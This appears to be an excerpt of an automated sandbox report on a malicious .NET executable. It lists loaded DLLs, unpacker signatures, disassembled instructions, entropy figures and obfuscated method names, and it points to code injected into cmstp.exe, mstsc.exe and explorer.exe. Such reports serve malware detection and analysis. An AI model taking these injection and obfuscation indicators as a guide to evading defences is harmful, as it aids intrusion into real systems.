Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: credui.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: wkscli.dll

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CZyOWoN2hiszA6d.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CZyOWoN2hiszA6d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cmstp.pdbGCTL source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2119998400.0000000001710000.00000040.10000000.00040000.00000000.sdmp, CZyOWoN2hiszA6d.exe, 00000009.00000002.2120061391.0000000001797000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4473546290.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4474981197.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4474981197.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2121854419.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2119897529.000000000480B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2226779254.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2230420750.000000000436C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CZyOWoN2hiszA6d.exe, CZyOWoN2hiszA6d.exe, 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 0000000D.00000002.4474981197.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4474981197.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2121854419.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2119897529.000000000480B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2226779254.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2230420750.000000000436C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2119998400.0000000001710000.00000040.10000000.00040000.00000000.sdmp, CZyOWoN2hiszA6d.exe, 00000009.00000002.2120061391.0000000001797000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 0000000D.00000002.4473546290.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: dacYzRiJuWECy.exe, 00000010.00000002.2232733998.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234309196.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdb source: dacYzRiJuWECy.exe, 00000010.00000002.2232733998.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234309196.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.CZyOWoN2hiszA6d.exe.2aa3d10.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.CZyOWoN2hiszA6d.exe.72a0000.5.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	.Net Code: LJEwsnmKYi System.Reflection.Assembly.Load(byte[])
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	.Net Code: LJEwsnmKYi System.Reflection.Assembly.Load(byte[])
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	.Net Code: LJEwsnmKYi System.Reflection.Assembly.Load(byte[])
Source: 11.2.dacYzRiJuWECy.exe.24d3d94.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041EA56 push esp; ret	9_2_0041EA51
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041D4B5 push eax; ret	9_2_0041D508
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041D56C push eax; ret	9_2_0041D572
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041D502 push eax; ret	9_2_0041D508
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041D50B push eax; ret	9_2_0041D572
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_004176C3 push FCC6ED37h; retf	9_2_004176D5
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_00417782 push ds; ret	9_2_00417786
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041CF88 push ecx; ret	9_2_0041CF89
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A709AD push ecx; mov dword ptr [esp], ecx	9_2_01A709B6
Source: C:\Windows\explorer.exe	Code function: 10_2_0972E9B5 push esp; retn 0000h	10_2_0972EAE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0972EB1E push esp; retn 0000h	10_2_0972EB1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0972EB02 push esp; retn 0000h	10_2_0972EB03
Source: C:\Windows\explorer.exe	Code function: 10_2_1080E9B5 push esp; retn 0000h	10_2_1080EAE7
Source: C:\Windows\explorer.exe	Code function: 10_2_1080EB02 push esp; retn 0000h	10_2_1080EB03
Source: C:\Windows\explorer.exe	Code function: 10_2_1080EB1E push esp; retn 0000h	10_2_1080EB1F
Source: C:\Windows\explorer.exe	Code function: 10_2_10A399B5 push esp; retn 0000h	10_2_10A39AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_10A39B02 push esp; retn 0000h	10_2_10A39B03
Source: C:\Windows\explorer.exe	Code function: 10_2_10A39B1E push esp; retn 0000h	10_2_10A39B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_10C819B5 push esp; retn 0000h	10_2_10C81AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_10C81B02 push esp; retn 0000h	10_2_10C81B03
Source: C:\Windows\explorer.exe	Code function: 10_2_10C81B1E push esp; retn 0000h	10_2_10C81B1F
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695FBC0 pushad ; iretd	11_2_0695FBC1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003D1A3D push ecx; ret	13_2_003D1A50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B627FA pushad ; ret	13_2_04B627F9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B6225F pushad ; ret	13_2_04B627F9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B6283D push eax; iretd	13_2_04B62858
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B909AD push ecx; mov dword ptr [esp], ecx	13_2_04B909B6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C176C3 push FCC6ED37h; retf	13_2_02C176D5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C17782 push ds; ret	13_2_02C17786
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1D4B5 push eax; ret	13_2_02C1D508
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1D56C push eax; ret	13_2_02C1D572

Source: CZyOWoN2hiszA6d.exe	Static PE information: section name: .text entropy: 7.950657517538917
Source: dacYzRiJuWECy.exe.0.dr	Static PE information: section name: .text entropy: 7.950657517538917

Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, YaWNDkzXk3hqc5j8OV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OmJIAgBSZ0', 'fsmIxoAUAe', 'qp6IiWMOYG', 'MfmIQaCNd6', 'UkPIY2HNtR', 'WhfII3QI73', 'LZHIbLdAke'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, xFvuSCsYZ8mgJIumYQ.cs	High entropy of concatenated method names: 'Dispose', 'yXol9STxFJ', 'LxsaKRKsas', 'kYNee9niPs', 'okDlmYU7pI', 'XD5lzh5whh', 'ProcessDialogKey', 'yFPansa6yC', 'WFhalk3r5k', 'ON8aaoHxDP'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, jnaaw1ZDkpSdUtdy0f.cs	High entropy of concatenated method names: 'UCoY2SgW7J', 'IMdYojLRhO', 'gerYBQcimm', 'PkXYF4ipei', 'RlPYZy42t6', 'Io0YLS4rO7', 'tYFYhM7VmL', 'DQkY0a7kut', 'DoJYgaKp4K', 'k7TYtPu4Xb'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, p9aHCBjcN1ptphfcrG.cs	High entropy of concatenated method names: 'N4LlLicTVv', 'g4DlhRyY0Z', 'TsJlgFbtoL', 'qvOltjPKa9', 'QI2lxUTeZT', 'oiIli5yt7w', 'L5FVTAg2q67HLAxwdx', 'hXuXleJH2rwqcyF3km', 'GtNllAQZ0T', 'KcFlEAomZU'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, EkrIvB3I9wExmE28cl.cs	High entropy of concatenated method names: 'QQCF3F8ROb', 'hO8F5VqPQd', 'eHIBdeZT43', 'KvdBPOgdOD', 'hXTBCBSAOp', 'TuQBGOBhvS', 'X7YBW5UUU4', 'G0OB8AQ0wg', 'KgkBODr5mA', 'ql7BXQmD0e'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, DT3o8gwtuyu0LrAWfMt.cs	High entropy of concatenated method names: 'dLIIRv7VVG', 'w91IU8pLgX', 'T33IsSVYkn', 'R9yIyGRQp6', 'ITiI3T5gme', 'BLrIToc9a4', 'd0GI520Orb', 'QloI7L1xuN', 'nvhIjJiqaV', 'm5CIcUPyZx'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, opEsZ4pJhyjIm973pF.cs	High entropy of concatenated method names: 'EimQugddkv', 'rJPQmXuQ61', 'wnfYnPQk23', 'ABlYlV4Jfs', 'y0ZQHnqlfy', 'QwMQrHuOA7', 'RKhQvAq720', 'JBJQqE9R5K', 'QQBQk9fa6C', 'HhqQN4cKhV'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	High entropy of concatenated method names: 's6BE1PaVy4', 'Rf7E2BVMio', 'B9cEoUOWNi', 'ge8EBpLaQ4', 'J0YEFRtTHj', 'htgEZOJoJD', 'miVELZM6UT', 'D4xEh2Qf8a', 'ECXE04G6Y4', 'LvLEgk4CDy'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, kZRL9UOKx7K27Jjnos.cs	High entropy of concatenated method names: 'l1tIlTEtYN', 'g1bIEIUKNJ', 'c2pIw7tR5p', 'zmFI2ke7Bd', 'dofIoFhRGd', 'ORjIFyEmC4', 'w43IZwo15k', 'BDHYfvkvEM', 'A8SYuUJlFR', 'KPJY9wqoWT'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, xPllKBLhQH8lHhsjeB.cs	High entropy of concatenated method names: 'A2WBynoad9', 'GmkBTF5KF9', 'nueB7pegSM', 'BwoBjXoMQZ', 'oTFBxaCasm', 'r4fBijHYhJ', 'beBBQ2CDqs', 'V2oBYSVvNU', 'IZMBIBFLGX', 'b5CBbydCaj'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, iyQSdP6fG08SuG6VIh.cs	High entropy of concatenated method names: 'anbA7ox7g4', 'xsxAjfVWuy', 'BfqAJN1bL0', 'Y9KAKtMQNV', 'onwAPie7UX', 'ARYACN0K9b', 'gpYAWHBThP', 'rmmA8Jn81Z', 'PVnAXnSf6d', 'wRgAHwVCvb'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, X9eccBc5Dt5k3rGVxW.cs	High entropy of concatenated method names: 'XPYsGA3H9', 'kv0yN6pMW', 'rX9T7DPyF', 'cXK5AHPsR', 'rcbjMJN9L', 'GfMckvqYc', 'w4qZOZb5cJiP7kl3xR', 'dOhPqHfHGwX4MO4fhZ', 'GioYmundS', 'tHybFy0ku'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, GVPBj5maNPvgsSelfB.cs	High entropy of concatenated method names: 'HUkYJEFR6C', 'P1OYKOkoKU', 'VmNYdjFvmt', 'dV4YPxWLel', 'LlaYqH73kE', 'ndwYCuq5ED', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, rI8oRl0304FYKiqT7i.cs	High entropy of concatenated method names: 'fT8LRRx26N', 'iNMLUV5CM5', 't2CLsV7Qvc', 'wOBLyMJnx8', 'GrVL3f7clY', 'lEfLTZb5BO', 'GTjL548OVp', 'gPgL7FnBUV', 'KSXLjQuejT', 'Yd3Lc6GqrT'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, Ol1IBa46vOHO6Lbv3R.cs	High entropy of concatenated method names: 'ToString', 'flwiHaWGjJ', 'ojviKNH5ot', 'VxFidDlImY', 'HoqiPQhLU6', 'O0ciC3A3yr', 'xReiGJGAZ6', 'XcbiWWwTx3', 'RTii82ykZs', 'dDuiO7CZEd'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, DtoaUbN21nmdWp4qvk.cs	High entropy of concatenated method names: 'G6iZVqOCyY', 'H7QZRDiQcF', 'pvHZsmW9Xw', 'tFjZyH1ZbJ', 'cKbZTeDMK3', 'VMbZ5gmqhb', 'vTyZjv2psn', 'McXZcLbkbh', 'UQnKTl8A91u9XAoRD0q', 'eueLgO8tCifMeTaauYY'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, tI2Ee6Hrx4vF3IxHYw.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dpDa9wmyZa', 'BQEamRapWg', 'gslazlpAxI', 'QOSEnCjT1M', 'Uq6El9dYB4', 'I9yEaGgTgx', 'WCiEEDKomO', 'FiEj8qksbVJ3EKAHrei'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, NFEe2GVrrotLL1L3mO.cs	High entropy of concatenated method names: 'hHeZ1Vt9ZR', 'iNyZowklIy', 'S5EZFw6jUL', 'OTRZL35MMO', 'IhZZhQRnQF', 'y7YFMPn2Ww', 'LDsFSUpc79', 't1oFfDxMSM', 'JDuFugHDSg', 'AjfF9jjw7o'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, Mmsu5AigAdJeUuP32P.cs	High entropy of concatenated method names: 'PdfoqtYiJk', 'jqjokL1N85', 'gGsoNI93JN', 'Rq4o6pGfHw', 'R3noMQh4NB', 'nEHoSicmTm', 'aU5ofiDiSy', 'D2IouvGbWX', 'O6Ro9kMy4s', 'Ne9omLRZck'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, AmZDsXwKIkqpTOmNRcW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YaVbq1FIJb', 'W7rbkrEAma', 'WFPbN9fNHY', 'YESb6o7eOt', 'FmtbMyb9ZD', 'FCHbSL1T1D', 'KlKbfREeSM'
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, NLaMbueC4R79hXESWU.cs	High entropy of concatenated method names: 'nccxXdFjVl', 'bpmxrrL66k', 'dn0xqtTEaw', 'J9uxk5lyLn', 'q6AxKMtaRV', 'K2SxdipC78', 'GyYxPO9okj', 'tWmxCEhND1', 'OuCxG3HbLo', 'GwfxWqSqbN'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, YaWNDkzXk3hqc5j8OV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OmJIAgBSZ0', 'fsmIxoAUAe', 'qp6IiWMOYG', 'MfmIQaCNd6', 'UkPIY2HNtR', 'WhfII3QI73', 'LZHIbLdAke'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, xFvuSCsYZ8mgJIumYQ.cs	High entropy of concatenated method names: 'Dispose', 'yXol9STxFJ', 'LxsaKRKsas', 'kYNee9niPs', 'okDlmYU7pI', 'XD5lzh5whh', 'ProcessDialogKey', 'yFPansa6yC', 'WFhalk3r5k', 'ON8aaoHxDP'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, jnaaw1ZDkpSdUtdy0f.cs	High entropy of concatenated method names: 'UCoY2SgW7J', 'IMdYojLRhO', 'gerYBQcimm', 'PkXYF4ipei', 'RlPYZy42t6', 'Io0YLS4rO7', 'tYFYhM7VmL', 'DQkY0a7kut', 'DoJYgaKp4K', 'k7TYtPu4Xb'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, p9aHCBjcN1ptphfcrG.cs	High entropy of concatenated method names: 'N4LlLicTVv', 'g4DlhRyY0Z', 'TsJlgFbtoL', 'qvOltjPKa9', 'QI2lxUTeZT', 'oiIli5yt7w', 'L5FVTAg2q67HLAxwdx', 'hXuXleJH2rwqcyF3km', 'GtNllAQZ0T', 'KcFlEAomZU'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, EkrIvB3I9wExmE28cl.cs	High entropy of concatenated method names: 'QQCF3F8ROb', 'hO8F5VqPQd', 'eHIBdeZT43', 'KvdBPOgdOD', 'hXTBCBSAOp', 'TuQBGOBhvS', 'X7YBW5UUU4', 'G0OB8AQ0wg', 'KgkBODr5mA', 'ql7BXQmD0e'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, DT3o8gwtuyu0LrAWfMt.cs	High entropy of concatenated method names: 'dLIIRv7VVG', 'w91IU8pLgX', 'T33IsSVYkn', 'R9yIyGRQp6', 'ITiI3T5gme', 'BLrIToc9a4', 'd0GI520Orb', 'QloI7L1xuN', 'nvhIjJiqaV', 'm5CIcUPyZx'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, opEsZ4pJhyjIm973pF.cs	High entropy of concatenated method names: 'EimQugddkv', 'rJPQmXuQ61', 'wnfYnPQk23', 'ABlYlV4Jfs', 'y0ZQHnqlfy', 'QwMQrHuOA7', 'RKhQvAq720', 'JBJQqE9R5K', 'QQBQk9fa6C', 'HhqQN4cKhV'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	High entropy of concatenated method names: 's6BE1PaVy4', 'Rf7E2BVMio', 'B9cEoUOWNi', 'ge8EBpLaQ4', 'J0YEFRtTHj', 'htgEZOJoJD', 'miVELZM6UT', 'D4xEh2Qf8a', 'ECXE04G6Y4', 'LvLEgk4CDy'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, kZRL9UOKx7K27Jjnos.cs	High entropy of concatenated method names: 'l1tIlTEtYN', 'g1bIEIUKNJ', 'c2pIw7tR5p', 'zmFI2ke7Bd', 'dofIoFhRGd', 'ORjIFyEmC4', 'w43IZwo15k', 'BDHYfvkvEM', 'A8SYuUJlFR', 'KPJY9wqoWT'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, xPllKBLhQH8lHhsjeB.cs	High entropy of concatenated method names: 'A2WBynoad9', 'GmkBTF5KF9', 'nueB7pegSM', 'BwoBjXoMQZ', 'oTFBxaCasm', 'r4fBijHYhJ', 'beBBQ2CDqs', 'V2oBYSVvNU', 'IZMBIBFLGX', 'b5CBbydCaj'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, iyQSdP6fG08SuG6VIh.cs	High entropy of concatenated method names: 'anbA7ox7g4', 'xsxAjfVWuy', 'BfqAJN1bL0', 'Y9KAKtMQNV', 'onwAPie7UX', 'ARYACN0K9b', 'gpYAWHBThP', 'rmmA8Jn81Z', 'PVnAXnSf6d', 'wRgAHwVCvb'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, X9eccBc5Dt5k3rGVxW.cs	High entropy of concatenated method names: 'XPYsGA3H9', 'kv0yN6pMW', 'rX9T7DPyF', 'cXK5AHPsR', 'rcbjMJN9L', 'GfMckvqYc', 'w4qZOZb5cJiP7kl3xR', 'dOhPqHfHGwX4MO4fhZ', 'GioYmundS', 'tHybFy0ku'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, GVPBj5maNPvgsSelfB.cs	High entropy of concatenated method names: 'HUkYJEFR6C', 'P1OYKOkoKU', 'VmNYdjFvmt', 'dV4YPxWLel', 'LlaYqH73kE', 'ndwYCuq5ED', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, rI8oRl0304FYKiqT7i.cs	High entropy of concatenated method names: 'fT8LRRx26N', 'iNMLUV5CM5', 't2CLsV7Qvc', 'wOBLyMJnx8', 'GrVL3f7clY', 'lEfLTZb5BO', 'GTjL548OVp', 'gPgL7FnBUV', 'KSXLjQuejT', 'Yd3Lc6GqrT'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, Ol1IBa46vOHO6Lbv3R.cs	High entropy of concatenated method names: 'ToString', 'flwiHaWGjJ', 'ojviKNH5ot', 'VxFidDlImY', 'HoqiPQhLU6', 'O0ciC3A3yr', 'xReiGJGAZ6', 'XcbiWWwTx3', 'RTii82ykZs', 'dDuiO7CZEd'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, DtoaUbN21nmdWp4qvk.cs	High entropy of concatenated method names: 'G6iZVqOCyY', 'H7QZRDiQcF', 'pvHZsmW9Xw', 'tFjZyH1ZbJ', 'cKbZTeDMK3', 'VMbZ5gmqhb', 'vTyZjv2psn', 'McXZcLbkbh', 'UQnKTl8A91u9XAoRD0q', 'eueLgO8tCifMeTaauYY'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, tI2Ee6Hrx4vF3IxHYw.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dpDa9wmyZa', 'BQEamRapWg', 'gslazlpAxI', 'QOSEnCjT1M', 'Uq6El9dYB4', 'I9yEaGgTgx', 'WCiEEDKomO', 'FiEj8qksbVJ3EKAHrei'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, NFEe2GVrrotLL1L3mO.cs	High entropy of concatenated method names: 'hHeZ1Vt9ZR', 'iNyZowklIy', 'S5EZFw6jUL', 'OTRZL35MMO', 'IhZZhQRnQF', 'y7YFMPn2Ww', 'LDsFSUpc79', 't1oFfDxMSM', 'JDuFugHDSg', 'AjfF9jjw7o'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, Mmsu5AigAdJeUuP32P.cs	High entropy of concatenated method names: 'PdfoqtYiJk', 'jqjokL1N85', 'gGsoNI93JN', 'Rq4o6pGfHw', 'R3noMQh4NB', 'nEHoSicmTm', 'aU5ofiDiSy', 'D2IouvGbWX', 'O6Ro9kMy4s', 'Ne9omLRZck'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, AmZDsXwKIkqpTOmNRcW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YaVbq1FIJb', 'W7rbkrEAma', 'WFPbN9fNHY', 'YESb6o7eOt', 'FmtbMyb9ZD', 'FCHbSL1T1D', 'KlKbfREeSM'
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, NLaMbueC4R79hXESWU.cs	High entropy of concatenated method names: 'nccxXdFjVl', 'bpmxrrL66k', 'dn0xqtTEaw', 'J9uxk5lyLn', 'q6AxKMtaRV', 'K2SxdipC78', 'GyYxPO9okj', 'tWmxCEhND1', 'OuCxG3HbLo', 'GwfxWqSqbN'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, YaWNDkzXk3hqc5j8OV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OmJIAgBSZ0', 'fsmIxoAUAe', 'qp6IiWMOYG', 'MfmIQaCNd6', 'UkPIY2HNtR', 'WhfII3QI73', 'LZHIbLdAke'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, xFvuSCsYZ8mgJIumYQ.cs	High entropy of concatenated method names: 'Dispose', 'yXol9STxFJ', 'LxsaKRKsas', 'kYNee9niPs', 'okDlmYU7pI', 'XD5lzh5whh', 'ProcessDialogKey', 'yFPansa6yC', 'WFhalk3r5k', 'ON8aaoHxDP'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, jnaaw1ZDkpSdUtdy0f.cs	High entropy of concatenated method names: 'UCoY2SgW7J', 'IMdYojLRhO', 'gerYBQcimm', 'PkXYF4ipei', 'RlPYZy42t6', 'Io0YLS4rO7', 'tYFYhM7VmL', 'DQkY0a7kut', 'DoJYgaKp4K', 'k7TYtPu4Xb'
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, p9aHCBjcN1ptphfcrG.cs	High entropy of concatenated method names: 'N4LlLicTVv', 'g4DlhRyY0Z', 'TsJlgFbtoL', 'qvOltjPKa9', 'QI2lxUTeZT', 'oiIli5yt7w', 'L5FVTAg2q67HLAxwdx', 'hXuXleJH2rwqcyF3km', 'GtNllAQZ0T', 'KcFlEAomZU'
